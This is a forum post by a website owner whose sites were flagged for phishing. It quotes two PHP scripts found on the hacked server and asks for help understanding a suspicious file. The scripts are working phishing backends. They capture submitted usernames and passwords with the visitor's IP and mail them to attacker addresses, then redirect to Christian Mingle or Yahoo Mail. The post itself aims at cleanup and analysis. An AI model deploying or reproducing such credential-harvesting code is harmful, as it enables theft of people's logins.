Alright, now google webmaster tool told me, that my sites are reported as phising sites.
I removed all suspicious files/folder from my sites.
A file called
buff.php contained this:
http://pastebin.com/jJ3QS7UH
READ AT YOUR OWN RISK
My Avast goes wild on this file. Can anyone read/translate this?
Some fake-login php-files:
Quote:
<?php
$ip = getenv("REMOTE_ADDR");
$data=date("D M d, Y g:i a");
$message .= "User: ".$_POST['loginemail']."\n";
$message .= "PassWord: " .$_POST['password']."\n";
$message .= "Country: $ip\n";
$message .= "Date: $data\n";
$recipient = "[email protected]";
$subject = "Christian Mingle | $ip";
$headers = "From: Rashyd Bohaty <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
header("Location: http://www.christianmingle.com/");
?>
|
Quote:
<?php
$ip = getenv("REMOTE_ADDR");
$data=date("D M d, Y g:i a");
$message .= "====== Hacked By OBO ======\n";
$message .= "User: ".$_POST['username']."\n";
$message .= "PassWord: " .$_POST['passwd']."\n";
$message .= "Country: $ip\n";
$message .= "Date: $data\n";
$message .= "====== ® Trademark 2015 ======\n";
$recipient = "[email protected]";
$recipient2 = "[email protected]";
$subject = "Y!Logs $ip";
$headers = "From: Rashyd Bohaty <[email protected]>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
mail($recipient2,$subject,$message,$headers);
header("Location: http://www.yahoomail.com");
?>
|